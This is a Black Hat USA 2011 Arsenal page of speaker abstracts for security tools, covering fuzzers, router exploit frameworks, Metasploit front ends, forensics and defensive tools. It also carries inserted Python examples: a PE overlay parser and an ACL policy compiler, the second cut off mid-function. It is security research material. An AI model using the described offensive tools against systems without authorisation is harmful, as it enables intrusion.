Black Hat USA 2011

Black Hat USA 2011 // Black Hat Arsenal: Call for Tools

Caesars Palace Las Vegas, NV • July 30 - August 4

wed: Aug. 3 | thurs: Aug. 4

Black Hat is pleased to offer a Tool/Demo area for independent researchers and the open source community that will allow you to showcase your work. The concept is simple: we will provide kiosks complete with monitor, power and wired internet access, and you will bring your machine to showcase your work and answer questions from delegates attending Black Hat. Spaces will be limited in order to showcase unique tools/demos over the course of the Briefings.

Brad 'Nurse' Smith previews Black Hat Arsenal

Presentation Speakers/Abstracts

Chema Alonso

DUST: your RSS feed belongs to you

Law around the world is trying to control what is published on the Internet. After the WikiLeaks case and the HBGary ownage, everybody could see that there are many controls that can be used to close a website or a domain name and to cut the communication between the source and the audience. What happens if someone wants to close your blog? Could you still send any message to your audience? In this talk we provide a new way to publish your RSS feeds using P2P networks as a failover system. Dust is "only" a reader, but it can manage P2P feeds and multiple HTTP feeds from the same source, and, most importantly, it can migrate from one feed to multiple ones without any effort on the part of your readers.

Francisco Amato


Faraday (named in tribute to the six principles of Michael Faraday's scientific discipline) is an open source penetration test IDE. It is similar to a programming IDE (like Komodo, Eclipse or NetBeans), with the difference that Faraday is built for multiuser penetration testing. At first sight it seems like just another IDE, but it is much more than that. It consists of a client and a server, both containing databases, and is designed for distributing, indexing and analyzing the knowledge generated during a penetration test engagement.

Francisco Amato is a researcher and computer security consultant who works in the areas of vulnerability development, blackbox testing and reverse engineering. He runs his own company, [ISR] Infobyte Security Research, from which he has published audit tools and vulnerabilities in products from companies like Novell, IBM, Sun Microsystems, Apple and Microsoft. His latest work is evilgrade, a modular framework that allows the user to take advantage of the upgrade process of different applications, compromising the system by injecting custom payloads. He is a founding organizer of the ekoparty security conference in South America.



A weaponized Nokia N900 with a full suite of wireless and network penetration testing tools. The mobile pentesting image is freely available. This demo will go over the capabilities of the PwnPhone, particularly its wireless tools and techniques.

Awk is a wireless / network hacker from Pwnie Express who loves mobile devices with Linux.

Ryan Barnett

ModSecurity Demonstration Pages: ModSecurity Smoketest Page / ModSecurity JavaScript Sandbox

ModSecurity Smoketest Page

The ModSecurity Demo is a joint effort between the ModSecurity and PHPIDS project teams to allow users to test ModSecurity and PHPIDS. Any data submitted is sent to a ModSecurity install for inspection by the CRS and is then proxied to the PHPIDS page for normal inspection and processing. The response body is then inspected to confirm whether there are any evasion issues between the CRS and PHPIDS.

Demo Challenge

Your challenge is to try and bypass the attack detection mechanisms of ModSecurity and the OWASP Core Rule Set (CRS).

ModSecurity JavaScript Sandbox

The purpose of this demo is to show possible XSS defenses by using ModSecurity's Content Injection capability to insert defensive JavaScript at the beginning of HTML responses. This demo uses Eduardo (sirdarckcat) Vela's Active Content Signatures (ACS) code.

Demo Challenge

Your challenge is to try and bypass the ACS content injection and successfully execute a reflected XSS attack that runs JS code in your browser. You may toggle the XSS Content Injection Defense on or off by checking the box in the form below; this makes it easier to first confirm that an XSS payload works before testing it against the defense.

Ryan C. Barnett is a senior security researcher on Trustwave's SpiderLabs Team. He is a SANS Institute certified instructor and a member of both the Top 20 Vulnerabilities and CWE/SANS Top 25 Most Dangerous Programming Errors teams. In addition to working with SANS, he is also a WASC member, where he leads the Web Hacking Incidents Database (WHID) and Distributed Open Proxy Honeypots projects, and is the OWASP ModSecurity Core Rule Set (CRS) project leader. Mr. Barnett has also authored a Web security book for Addison-Wesley Publishing entitled Preventing Web Attacks with Apache.

Armin Buescher


ReplayProxy is a tool to replay HTTP traffic that is captured in a pcap file and features an extensible API to modify the replayed content. It can be used as a forensic tool to investigate Web-based attacks or to develop ways of reducing Web-based attacks.

Armin Buescher began studying Computer Science in Germany in 2002. After finishing his diploma thesis on the analysis of Web-based attacks, his work focused on the strategic development of techniques to prevent exploits and on tools that analyze these exploits, especially client honeypot systems. He joined Websense Security Labs in early 2011 as a security researcher.

Marcus Carey

Metasploit vSploit Modules

In this demonstration for security practitioners who are responsible for enterprise network security solutions, Marcus Carey shows how to use the Metasploit Framework beyond penetration testing to validate whether security solutions are working as expected. Marcus has researched network intrusion attributes for years and has successfully emulated those attributes with the Metasploit Framework. The new Metasploit modules are designed specifically for testing firewalls, IDS, IPS and DLP solutions.

Marcus J. Carey is the Enterprise Security Community Manager at Rapid7. Marcus has over 17 years of information assurance experience, working in the DoD as well as Federal and State Government organizations. Marcus holds an M.S. in Network Security from Capitol College as well as several security-related certifications.

Andrew Case

Registry Decoder

The registry on all Microsoft Windows operating systems contains a wealth of forensically interesting information, including a history of attached devices, a list of user accounts, URLs typed into local web browsers, information about network shares and much more. Unfortunately, existing tools for processing the Windows registry are difficult to use and leave the investigator with many complex, manual tasks. Not only does this lead to human error and waste a substantial amount of time during investigations, it also leads to missed evidence due to investigator inexperience. For investigators who are not constantly trained or self-taught, the ever-changing format of the registry, the meaning of keys, and the value of the information contained are simply lost.

To combat these issues, we developed Registry Decoder, a point-and-click tool that collects and analyzes the Windows registry files from forensic targets and prepares a readable report for the investigator. The tool contains two applications: the first is used for traditional "dead" forensics against hard drive images and the second for "live" (triage) analysis of running machines. Registry Decoder is easily customizable and provides an interface for investigators to quickly identify what information is most crucial for their cases, extract that data and render it into a report format. Additional information is provided to give the investigator practical insight into the meaning and relevance of the data collected. Registry Decoder can also examine values in the current Windows registry alongside copies of the registry stored by the system restore point facility, cross-referencing them to help reconstruct a historical picture of the system under investigation. Registry Decoder also creates visualizations of a number of types of relevant information, both to help investigators quickly understand the data and to present evidence to non-technical peers.

Andrew Case is a researcher at Digital Forensics Solutions where he is responsible for source code audits, penetration testing, reverse engineering, and other computer security related tasks. He is also a GIAC-certified digital forensics investigator and has conducted numerous large-scale investigations. Andrew is the co-developer of Registry Decoder, a National Institute of Justice-funded forensics application, as well as a developer on the Volatility memory analysis project. Andrew's primary research focus is physical memory analysis, and he has published a number of peer-reviewed papers in the field. He has presented this work at conferences including Black Hat, SOURCE, and DFRWS.

Stephan Chenette

Fireshark v2

I will present a web security research project called FireShark that is capable of visiting large collections of websites at a time, executing, storing and analyzing their content, and from it identifying hundreds of malicious ecosystems whose data, such as the normalized, deobfuscated content within them, can easily be analyzed.

Stephan Chenette is a principal security researcher at Websense Security Labs, specializing in research tools and next generation emerging threats. In this role, he identifies and implements exploit and malcode detection techniques. Stephan has released public analyses on various vulnerabilities and malware. Prior to joining Websense, Stephan was a security software engineer working in research and product development at eEye Digital Security.

Thomas Cross + Christopher Byrd + Takehiro Takahashi

Secure Open Wireless Demo

We'll be demoing our GPLv2 proof-of-concept code for Secure Open Wireless, which we're releasing at Black Hat. Today, 802.11 wireless networks are either unencrypted or they require authentication. We're demonstrating a third way which uses an anonymous form of EAP-TLS to create an encrypted wireless connection without a pre-shared password. Users are protected from rogue access points by an SSL certificate tied to the SSID of the access point. In our approach, certified SSIDs would have to be globally unique identifiers; domain names could be used for this purpose. An SSH-style trust-on-first-use fallback mechanism can protect connections to networks that are too small to protect with a commercial certificate authority.

Tom Cross manages Threat Intelligence and Strategy for IBM's X-Force Research organization.

Christopher Byrd helps businesses and organizations understand and respond to risks associated with technology. He is currently a Manager in Brown Smith Wallace's Risk Advisory Services group and Security and Privacy services leader.

Takehiro Takahashi is an individual security researcher, and formerly a vulnerability researcher at IBM X-Force.

Isaac Dawson

The Web Browser Testing System (WBTS)

The Web Browser Testing System (WBTS) was built to quickly automate and test various browsers and user-agents for security issues. It contains all the services required for testing a browser: DNS, HTTP(S), logging services and support for virtual hosts.

Isaac Dawson was in the security consulting industry for nine years prior to contracting at Veracode as a security researcher. He has conducted hundreds of application penetration tests while working at @stake and subsequently Symantec Consulting. Shortly after @stake was purchased he released a paper on exploiting blind buffer overflows in ISAPI extensions which was featured on SecurityFocus. Late in 2005 he relocated to Japan and helped build the Symantec Japan security consulting team. Since relocating, he has done extensive application testing work for a large cellular operator. One such assessment was of a mobile browser implementation; since then he has enjoyed learning about and attempting to break various browsers.

Timur Duehr


Ragweed is our native code debugging library written in Ruby. It runs on Win32, OS X and Linux. That's right, we implemented a native code debugger from the ground up using nothing but Ruby and FFI. You read that right: no third-party dependencies! Ragweed can be used to build powerful tools such as scriptable debuggers and hit tracers. You can rewrite GDB with it, or an in-memory fuzzer, in just a few lines of code! There are many convenience methods for retrieving information from a target process, such as heap and stack mappings, loaded libraries and much more.

Timur Duehr is a Security Consultant at Matasano Security with over six years of computer consulting experience. His professional experience includes application development, security assessment, and code review.

Gregory Fleischer, Nathan Hamiel

RAFT - Response Analysis and Further Testing

RAFT is an open source Python tool designed to assist with web application assessments.

Many current web testing tools are struggling to keep up with modern web applications that have moved to highly dynamic page generation and web service communication channels. RAFT attempts to bridge this gap by providing response analysis capabilities for existing tools' logs and stored session information. RAFT supports directly importing Burp files as well as Paros and WebScarab proxy logs. Additionally, RAFT defines its own XML capture format that can be used to store traffic from custom tools; a urllib2-compatible processor module is provided.

RAFT is also a proof-of-concept utility to help discover and crawl dynamic content, perform smart fuzzing, improve visibility into modern web applications, and serve as a testbed for exploring emerging HTML5 features. By embedding Qt's WebKit web browser, RAFT can interact directly with the rendered content using the browser DOM and injected JavaScript callbacks. This provides interesting capabilities such as fuzzing for DOM-based XSS injections in previously stored responses using a totally offline approach. A future version of the tool is expected to contain an integrated scanner component and reusable analysis engine.

RAFT is released under a GPLv3 license.

Gregory Fleischer is a Senior Security Consultant in the Application Security practice at FishNet Security. In his spare time, he likes to find and exploit vulnerabilities in web browsers and client-side technologies such as Java and Flash. He has an interest in privacy and anonymity and has worked with The Tor Project to identify potential issues.

Nathan Hamiel is a Principal Consultant for FishNet Security's Application Security Practice. He is also an Associate Professor of Software Engineering at the University of Advancing Technology. He spends most of his time focusing in the areas of application, Web 2.0, and enterprise security. Nathan has been a speaker at security events around the world including: Black Hat, DefCon, ShmooCon, ToorCon, SecTor, and many others.

Travis Goodspeed

GoodFET for Wireless Keyboard Sniffing

The Microsoft 2.4GHz Wireless Keyboards use a five-byte XOR key and a Nordic RF nRF24L01+ radio. Sniffing is made difficult because the key is also used as a Start of Frame Delimiter unique to each keyboard/dongle pair. By some Layer 1 trickery, it is possible to sniff keyboard packets without knowing the SFD. This demonstration features an unmodified keyboard being sniffed by a badge from the Next Hope conference, running the GoodFET firmware.

Travis Goodspeed is a neighborly reverse engineer of embedded systems from Southern Appalachia. He maintains the GoodFET project, which acts as a USB adapter for JTAG debugging and a variety of radio chips. Among other types of radios, the GoodFET can receive and broadcast APCO P25, ZigBee, ANT+, and a few dozen other protocols. He is also the designer of the Next Hope conference badge.

Alejandro Hernández

DotDotPwn - The Directory Traversal Fuzzer

DotDotPwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as Web/FTP/TFTP servers and Web platforms such as CMSs, ERPs, blogs, etc. It also has a protocol-independent module to send the desired payload to a specified host and port, and it can be driven from scripts using the STDOUT module. It is written in Perl and runs on either *NIX or Windows platforms.

Fuzzing modules supported:

  • HTTP
  • FTP
  • TFTP
  • Payload (Protocol independent)

Today, DotDotPwn has found more than 10 security flaws in some HTTP, FTP and TFTP servers.

Alejandro Hernández is a Mexican IT Security Advisor who is mostly involved in projects regarding penetration testing, IT governance, risk analysis, tiger teaming, ISMS design, gap analysis, security control assessments, IT security strategy design and the audit of IT controls over financial reporting, among other tasks.

With some years of vulnerability development experience, he has found design and security bugs in products of companies such as Cisco and TrendMicro, as well as in software like Ubuntu Linux, Snort and Acunetix WVS. One of his latest achievements was capturing the flag in the CTF (Capture The Flag) held at SANS Toronto '10.

Nowadays, he spends part of his time doing research on topics regarding critical infrastructure and intelligent fuzzing. He is also fascinated by Computer Science, Evolutionary Computation (specifically Genetic Algorithms), Tactical Exploitation and Counterintelligence.

Pedro Joaquin


Routerpwn is a mobile exploitation framework that helps you in the exploitation of vulnerabilities in network devices such as residential and commercial routers, switches and access points.

It is a compilation of ready-to-run local and remote web exploits, programmed in JavaScript and HTML in order to run on all "smart phones" and mobile Internet devices, including Android, iPhone, BlackBerry and all tablets. You can even store it offline for local exploitation without an Internet connection.

Pedro "hkm" Joaquin was born on Cozumel island in the Caribbean. Pedro used to be a forensic investigator, malware analyst and antimalware software vendor for the top banks in Mexico. He has since founded his own company, which focuses on vulnerability research and pentesting. 10 years ago Pedro created a community called "Mexican Underground Community" ( which focuses on hacking and phreaking. It is the largest hacking community in Mexico. With this community he has organized a vast number of public and private meetings all over Mexico, including some 2600 ones. Over the past years Pedro has been researching residential routers and has found several critical bugs in many of them. He has been a speaker at many conferences including DEFCON.

Byoungyoung Lee

DarunGrim: A Patch Analysis and Binary Diffing Tool

DarunGrim is a free binary diffing tool. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. By analyzing security patches in particular, you can dig into the details of the vulnerabilities they fix. You can use that information to learn what causes the software to break, and it can help you write protection code for those specific vulnerabilities. It is also used to write 1-day exploits by malware writers or security researchers. Please check more information on

Byoungyoung Lee is currently an M.S. student at POSTECH. He is a sub-developer of DarunGrim and has interests in both practical and academic software security research. In the past, he actively participated in wargames and advanced to the DEFCON CTF final round two times. He has also published fuzzers and exploits targeting Microsoft products. His academic research interests are in binary obfuscation and location privacy, on which he has published in ACM SIGKDD and ACM ASIACCS. From Fall 2011, he will join the CS Ph.D. program at Georgia Tech.

Gordon Fyodor Lyon

Mastering the New Nmap

Many Black Hat attendees keep the free Nmap Security Scanner ( in their toolbox, but few truly harness its full power. While Nmap is simple to use for basic scanning, it also offers hundreds of powerful options for optimizing performance, detecting and defeating firewalls and intrusion detection systems, and even performing application-level audits. Nmap also evolves so quickly that keeping up with the new capabilities is a challenge. This session is an opportunity to enhance your skills by asking Nmap's author Fyodor anything about Nmap or its companion tools Ncat, Zenmap, Ndiff, and Nping. Fyodor will also demonstrate powerful new capabilities of Nmap, with a particular emphasis on the Nmap Scripting Engine and IPv6 support.

Fyodor (known to his family as Gordon Lyon) authored the open source Nmap Security Scanner in 1997 and continues to coordinate its development. He also maintains the Insecure.Org, Nmap.Org, SecLists.Org, and SecTools.Org security resource sites and has authored seminal papers on remote operating system detection and stealth port scanning. He is a founding member of the Honeynet project, former president of Computer Professionals for Social Responsibility (CPSR), and author or co-author of the books "Nmap Network Scanning", "Know Your Enemy: Honeynets" and "Stealing the Network: How to Own a Continent". Videos of his 2010 and 2008 Black Hat and Defcon presentations can be viewed at

Christian Martorella

Wfuzz & WebSlayer 2.0

Wfuzz is a tool designed for brute forcing Web applications. It can be used to discover resources (directories, scripts, files), brute force GET and POST parameters, brute force form parameters (user/password), fuzz inputs, and brute force Basic and NTLM authentication. The tool is very flexible and is the one-stop solution for Web application brute forcing.

This new version includes redesigned payload management, payload combinations and randomization, improved output, no limit on injection points (you can use as many as you want), SOCKS support, multiple proxies (each request will be sent through a different proxy) and a time delay between requests, plus all the previous features like multiple encodings.

Webslayer is the GUI front-end with advanced features like an advanced Payload generation engine and flexible result analysis.

Christian Martorella has been working in the field of information security for the last 10 years. He started his career as a security consultant at the Argentine IRS and is now Practice Leader in Threat and Vulnerability Consulting, EMEA, at Verizon Business. He is a co-founder and active member of the Edge-Security team, which releases security tools and research. He has been a speaker at What The Hack!, NoConName, FIST Conferences, OWASP Summit, OWASP Spain IV & VI, Source Conference Barcelona and Hack.LU. Christian has contributed open source assessment tools such as OWASP WebSlayer and Metagoofil. He likes everything related to information gathering and penetration testing.

Christian Martorella

TheHarvester and Metagoofil 2.0

theHarvester and Metagoofil are tools developed to aid penetration testers in the information gathering task. The tools can gather email accounts, subdomains, virtual hosts, metadata from publicly available documents (usernames, server names, software versions, etc.) and employee names, using different data sources such as search engines, PGP key servers and LinkedIn.

These new versions were developed from scratch focusing on extensibility and new features. This version of Metagoofil allows searching a local filesystem, adds new libraries to parse documents more efficiently (increasing the results), adds a new option to extract emails and subdomains from document content (PDFs), and adds proxy support. theHarvester comes with new data sources (google-profiles, the Exalead search engine, bing_api and google_api); this version includes virtual host discovery and recursive discovery. Both tools can save their results in XML for import into other tools.

Willem Mouton


Yeti is a SensePost tool for internet footprinting, fingerprinting and DNS mining. Its SQL database backend and scripting interface make it a really powerful, yet easy to use tool. So if there is a target out there, the Yeti will find it.

Willem hails from a development background and is responsible for developing most of SensePost's internal tools. With his mind-set being very much that of a builder, his skills at penetration testing ensure he gains root on many assessments, due to him knowing where weaknesses are often introduced during the development phase.

Raphael Mudge

Armitage for Metasploit: Squad Level Cyber Operations

Featured on the cover of the May 2011 Linux Journal and used by Cameron to hack Oz's system on Fox's Breaking In, Armitage is a graphical cyber attack management tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced capabilities of the framework. This demonstration will show how to manage remote Metasploit instances and collaborate using Armitage. You'll learn how to share sessions and data, communicate, and carry out advanced post-exploitation as a team through one Metasploit instance.

Raphael Mudge is a Washington, DC, based code hacker working on a new startup effort. His current open source work is the Armitage GUI for Metasploit. His past projects include the After the Deadline proofreading software service and the Sleep scripting language. Raphael has worked as a security researcher, software engineer, penetration tester, and system administrator. Raphael also holds a commission in the Air National Guard.

Matthew Olney

Razorback Framework

Developed by Sourcefire's Vulnerability Research Team, the Razorback Framework is a near-real time defense system. Much like Metasploit (but for the defense side), it is designed to give security teams a platform for the rapid development and deployment of detection strategies. The current version of this open source tool displays enterprise scalability, agile defense development, linked data retention and verbose alerting.

Matthew Olney works on Sourcefire's Vulnerability Research Team as a Principal Research Engineer and the Architect for the Razorback project. In addition to providing expertise in the Snort engine, detection concepts and rule writing, Matt assists the Sourcefire training group in advanced security course development. He has spoken on Snort internals, rule development and advanced detection issues. Matt brings to the VRT a strong operations background, having worked in network and security engineering roles with such organizations as Verisign, Network Solutions, Nortel and the Department of Defense.

Mike Ridpath


A proof-of-concept tool showcasing how one can break SSL sessions on Google Maps. It enables one to build profiles of scraped Google Maps satellite tiles and is then able, based on this profile data, to break SSL sessions to Google Maps and reconstruct the locations a user is looking at.

Mike Ridpath is a Security Consultant with IOActive, where he works directly with enterprise clients to deliver time-sensitive, mission-critical engagements that assess the security of networks and applications, including both physical and social engineering penetration tests. In addition to finishing his Master's degree in Information Security, Ridpath has discovered numerous previously unknown software security vulnerabilities while on engagements and presented his findings to C-level client stakeholders. Ridpath recently co-delivered the presentation "Social Engineering and the Cold Call" at Toorcon Seattle 2011 and played on the winning Capture the Flag team at Defcon 2010.

Prior to working at IOActive, Ridpath was in senior management as a product developer and on governing boards for multiple training and process improvement companies, where he worked with risk analysis and various process improvement methodologies.

David Rook


Working with developers, security professionals and management to cultivate an environment where secure code is written and flaws are found consistently requires both time and money. The same can be said for producing informative reports and metrics when all of your security code review data resides in Notepad, Word and Excel files. With these problems in mind I developed Agnitio to be my security code review Swiss army knife and released it as an open source tool in late 2010.

In this demonstration-filled presentation I will show how Agnitio can be used to address repeatability, integrity and audit trail concerns by requiring the creation of application profiles, the use of a security code review checklist consisting of over 60 application security questions, and mandatory integrity checks for reviews and reports created using the tool. I will demonstrate how the built-in secure coding and security code review guidance modules allow developers and security professionals to access the information they need precisely when they need it. I will also show how Agnitio automatically creates metrics and reports, bringing much-needed visibility to the security code review process with no extra effort required from the reviewer, developers or management.

Agnitio v2.0 will be released during this presentation, expanding Agnitio's already powerful feature set to include more secure coding and security code review guidance, additional report types, developer- and reviewer-focused metrics, and an automated source code analysis module.

David works as a Security Analyst for Realex Payments in Dublin. He is a contributor to several OWASP projects including the code review guide and the Cryptographic Storage Cheat Sheet. He has presented at leading information security conferences including DEF CON, SecurityBSides Las Vegas and RSA Europe. In addition to his work with OWASP David created a security resource website and blog called Security Ninja (

In 2010 the Security Ninja blog was nominated for five awards including the best technology blog at the Irish Blog Awards, the Computer Weekly IT Security blog award and was a finalist for the Irish Web Awards Best Technology Site. The website has an international audience with visitors from over 140 countries. David has recently become one of the first mentors in the Information Security Mentors project helping young people progress their information security careers.

Chris Schmidt

Enterprise Security API

ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development.

Chris Schmidt is an Application Security Engineer and Senior Software Engineer at Aspect Security. He is heavily involved in the Open Web Application Security Project (OWASP) as a leader, contributor, and frequent speaker at local and global application security conferences. He has worked in IT for more than 15 years as a Hardware Engineer, Software Engineer, and Systems Architect. He is one of the Project Managers for the OWASP Enterprise Security API and serves on the OWASP Global Projects Committee.

Maximiliano Soler

FireCAT: Weaponizing your Browser

Building on the great Firefox browser and its customization capabilities, we have created FireCAT: Firefox Catalog of Auditing exTensions.

FireCAT lets us turn the browser into a powerful auditing weapon using only the appropriate extensions and a good deal of imagination.

We will explain, step by step, how Firefox can give you a wide and varied list of utilities, ready to put into action!

Trivia: The idea behind FireCAT came during a pentest, when I was challenged to perform it without any tools. Firefox, together with its extensions, turned out to be a great help.

What is FireCAT?

FireCAT (Firefox Catalog of Auditing exTensions) is a mind map collection of the most efficient and useful Firefox extensions oriented to application security auditing and assessment. FireCAT is not a replacement for other security utilities and software such as fuzzers, proxies and application vulnerability scanners.


  • Current Version: 1.6.2
  • Addons: > 80
  • Categories: 7
  • Subcategories: 18

Environments where it can be applied:

  • Web Application Security.
  • Phishing detection.
  • Code auditing.
  • Vulnerability mapping.


  • Included add-ons.
  • Scope of the project.
  • What's new and the future of FireCAT.
  • A NEW version will be released at BH.


Information Gathering.

  • Whois.
  • Local info.
  • Enumeration & Fingerprint.
  • Data Mining.
  • Googling & Spidering.
  • All in one.

Proxying / Web Utilities.

Security Auditing.

Network Tools.

  • Intrusion Detection System.
  • Sniffers.
  • Wi-Fi.
  • Passwords.
  • Protocols / Applications.


IT Security Related.


  • Hacks for fun.
  • Encryption / Hashing.
  • Malware Scanner.
  • Anti Spoof.
  • Anti phishing / Pharming / Jacking.
  • Automation.
  • Logs / History

Currently working as a Security Consultant at an international bank. I have discovered vulnerabilities in different web applications and Microsoft products.

I'm part of the team responsible for FireCAT, which contributes new material to it day by day.

Mario Suvajac

Impact of unpublished features of PE Format and their validation with TitanEngine and TitanMist

ReversingLabs will present its latest research on unpublished PE format features at Black Hat Las Vegas 2011. Come to the Arsenal booth to see these findings live, discuss their impact, and learn how to detect and validate them. In addition, we will be demonstrating how our open source and freeware tools (TitanEngine – BH LV 2009, NyxEngine – BH Barcelona 2010, TitanMist – BH LV 2010) can help you manipulate published and unpublished PE features and detect and decompose complex payloads that may be hiding within.
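As an added example for the PE material above (written for this page; it is not ReversingLabs' code and does not reproduce the unpublished features the talk covers), here is a minimal PE parser that bounds-checks the header chain and the section table against the file size and reports any overlay: the bytes past the last section's raw data, where appended payloads commonly sit. The sample image is constructed in build_sample_pe and is not a real binary.

```python
import struct
from dataclasses import dataclass, field
from typing import List

COFF_HDR = "<HHIIIHH"          # IMAGE_FILE_HEADER (20 bytes)
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER (40 bytes)


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_pointer: int
    raw_size: int
    characteristics: int


@dataclass
class PEReport:
    machine: int
    pe32_plus: bool
    sections: List[Section] = field(default_factory=list)
    warnings: List[str] = field(default_factory=list)
    overlay_offset: int = 0      # first byte after the last section's raw data
    overlay_size: int = 0        # bytes the section table does not account for


def parse_pe(data: bytes) -> PEReport:
    """Walk DOS header -> PE signature -> COFF header -> section table, bounds-checking
    every pointer against the file size, and report any overlay past the last section."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    coff = e_lfanew + 4
    opt = coff + struct.calcsize(COFF_HDR)
    if opt + 2 > len(data):
        raise ValueError("e_lfanew points past the end of the file")
    if data[e_lfanew:coff] != b"PE\0\0":
        raise ValueError("PE signature missing")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, data, coff)
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    report = PEReport(machine=machine, pe32_plus=(magic == 0x20B))

    table = opt + opt_size
    hdr_len = struct.calcsize(SECTION_HDR)
    if table + nsections * hdr_len > len(data):
        present = max(0, (len(data) - table) // hdr_len)
        report.warnings.append("section table truncated: %d declared, %d fit in file" % (nsections, present))
        nsections = present

    data_end = table + nsections * hdr_len
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HDR, data, table + i * hdr_len)
        sec = Section(f[0].rstrip(b"\0").decode("latin-1"), f[2], f[1], f[4], f[3], f[9])
        report.sections.append(sec)
        if sec.raw_size == 0:
            if sec.virtual_size:
                report.warnings.append("%s: no raw data but %#x bytes virtual (filled at run time?)"
                                       % (sec.name, sec.virtual_size))
            continue
        end = sec.raw_pointer + sec.raw_size
        if end > len(data):
            report.warnings.append("%s: raw data runs past the end of the file" % sec.name)
            end = len(data)
        data_end = max(data_end, end)
    report.overlay_offset = data_end
    report.overlay_size = len(data) - data_end
    return report


def build_sample_pe(overlay: bytes = b"", declared_sections: int = None) -> bytes:
    """Constructed two-section PE32 skeleton (not a runnable binary) for exercising the parser."""
    sections = [(b".text", 0x1000, 0x200), (b".data", 0x2000, 0x100)]
    opt_size = 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    nsec = len(sections) if declared_sections is None else declared_sections
    coff = b"PE\0\0" + struct.pack(COFF_HDR, 0x14C, nsec, 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)               # PE32 magic, rest zeroed
    table, body, ptr = b"", b"", 0x200                                     # 0x200 file alignment
    for name, va, size in sections:
        table += struct.pack(SECTION_HDR, name, size, va, size, ptr, 0, 0, 0, 0, 0x60000020)
        body += b"\xCC" * size
        ptr += size
    headers = dos + coff + opt + table
    return headers + b"\0" * (0x200 - len(headers)) + body + overlay


if __name__ == "__main__":
    rep = parse_pe(build_sample_pe(b"HIDDEN-PAYLOAD"))
    for s in rep.sections:
        print("%-8s raw %#06x+%#x" % (s.name, s.raw_pointer, s.raw_size))
    print("overlay: %d bytes at %#x" % (rep.overlay_size, rep.overlay_offset), rep.warnings)
```

Passing declared_sections=50 to the builder shows the parser refusing to walk a section table that the file cannot hold, which is the kind of header inconsistency a loader may tolerate but a decomposition tool has to flag rather than trust.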

Mario Suvajac is a Senior Reverse Engineer at ReversingLabs. He has several years of experience reversing archive and PE formats. Currently he works on next generation decomposition technologies.

Paul Watson


Capirca is an open source, cross-platform network security policy compiler developed at Google. It allows the creation and deployment of ACL filters across multiple target platforms from a single security policy and shared network and service definitions. The software suits both small and large organizations, eliminating common errors while greatly simplifying security policy maintenance.
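As an added example (written for this page; it is not Capirca's code, syntax or API), the following sketch shows the shape of such a compiler: a policy written once against shared network and service tokens, expanded into concrete rules and rendered for two targets, a Cisco extended ACL and iptables. The token names, policy terms and addresses are constructed. Wildcard masks and protocol keywords are derived from the definitions, and an undefined token or action fails at compile time instead of producing a silently wrong filter.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

# Shared definitions, constructed for this example (the dict layout is this example's own).
NETWORKS: Dict[str, List[str]] = {
    "ANY": ["0.0.0.0/0"],
    "CORP_LAN": ["192.168.0.0/16"],
    "WEB_SERVERS": ["10.0.1.0/24", "10.0.2.10/32"],
}
SERVICES: Dict[str, List[Tuple[str, int]]] = {
    "HTTPS": [("tcp", 443)],
    "DNS": [("udp", 53), ("tcp", 53)],
}
ACTIONS = {"accept": ("permit", "ACCEPT"), "deny": ("deny", "DROP")}   # (cisco verb, iptables target)


@dataclass
class Term:
    name: str
    source: str        # NETWORKS token
    destination: str   # NETWORKS token
    service: str       # SERVICES token, or "" for any protocol/port
    action: str        # "accept" or "deny"


# One policy, written once against the tokens above.
POLICY = [
    Term("allow-corp-https", "CORP_LAN", "WEB_SERVERS", "HTTPS", "accept"),
    Term("allow-corp-dns", "CORP_LAN", "WEB_SERVERS", "DNS", "accept"),
    Term("default-deny", "ANY", "ANY", "", "deny"),
]


def lint(policy: List[Term]) -> List[str]:
    """Catch the errors a hand-written ACL would carry silently: unknown tokens and actions."""
    errors = []
    for t in policy:
        for tok in (t.source, t.destination):
            if tok not in NETWORKS:
                errors.append("%s: undefined network %r" % (t.name, tok))
        if t.service and t.service not in SERVICES:
            errors.append("%s: undefined service %r" % (t.name, t.service))
        if t.action not in ACTIONS:
            errors.append("%s: unknown action %r" % (t.name, t.action))
    return errors


def expand(term: Term) -> Iterator[Tuple[ipaddress.IPv4Network, ipaddress.IPv4Network, str, Optional[int]]]:
    """Cross product of source nets x destination nets x (protocol, port): one concrete rule each."""
    services = SERVICES[term.service] if term.service else [("ip", None)]
    for src in NETWORKS[term.source]:
        for dst in NETWORKS[term.destination]:
            for proto, port in services:
                yield ipaddress.ip_network(src), ipaddress.ip_network(dst), proto, port


def _cisco_addr(net: ipaddress.IPv4Network) -> str:
    if net.prefixlen == 0:
        return "any"
    if net.prefixlen == 32:
        return "host %s" % net.network_address
    return "%s %s" % (net.network_address, net.hostmask)   # wildcard mask derived, never typed by hand


def render_cisco(policy: List[Term], acl_name: str = "filter") -> List[str]:
    errors = lint(policy)
    if errors:
        raise ValueError("; ".join(errors))
    lines = ["ip access-list extended %s" % acl_name]
    for t in policy:
        lines.append(" remark %s" % t.name)
        for src, dst, proto, port in expand(t):
            rule = " %s %s %s %s" % (ACTIONS[t.action][0], proto, _cisco_addr(src), _cisco_addr(dst))
            lines.append(rule + (" eq %d" % port if port is not None else ""))
    return lines


def render_iptables(policy: List[Term], chain: str = "FORWARD") -> List[str]:
    errors = lint(policy)
    if errors:
        raise ValueError("; ".join(errors))
    lines = []
    for t in policy:
        for src, dst, proto, port in expand(t):
            rule = "-A %s -m comment --comment %s" % (chain, t.name)
            if proto != "ip":
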